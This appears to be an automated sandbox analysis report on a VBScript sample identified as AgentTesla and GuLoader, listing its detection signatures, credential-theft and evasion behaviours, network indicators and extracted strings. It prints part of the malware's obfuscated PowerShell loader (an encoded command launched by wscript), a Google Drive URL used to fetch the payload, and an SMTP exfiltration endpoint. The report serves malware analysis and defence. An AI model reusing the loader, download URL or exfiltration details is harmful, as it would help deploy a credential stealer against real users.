Windows Analysis Report
PUMP mt310143121.vbs

Overview

General Information

Sample Name: PUMP mt310143121.vbs
Analysis ID: 715071
MD5: 41ad96654d44ef375097eeeb83818cf7
SHA1: 20dae7bc9d6dc2c5f947de3f871d617fb36e6edc
SHA256: 28bf271ec1576c0e7d1b2a243de952bb70c25711cdc9c2d4494002a3e2f346ca
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Yara detected GuLoader
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PUMP mt310143121.vbs Virustotal: Detection: 8% Perma Link
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: CasPol.exe.6376.25.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "COCO_.zipCookieapplication/zip-f \\Data\\Tor\\torrcp=127.0.0.1POST+%2Bapplication/x-www-form-urlencoded"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C286B0 CryptUnprotectData, 26_2_20C286B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 26_2_20C286AB CryptUnprotectData, 26_2_20C286AB
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 216.218.206.36 216.218.206.36
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2266408532.0000000021054000.00000004.00000800.00020000.00000000.sdmp, Cookies.26.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.26.dr String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://AzAPmg.com
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072070066.0000000001507000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.prgisi.com
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5766354780.000000001DCAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a1BgY4r4bA.com
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a1BgY4r4bA.comt-
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%mail.prgisi.comjcvaleroso
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: CasPol.exe, 0000001A.00000003.2072435740.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5716278615.00000000014A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072883437.0000000001531000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5727289842.0000000001531000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6h
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCb
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCt
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/y
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFM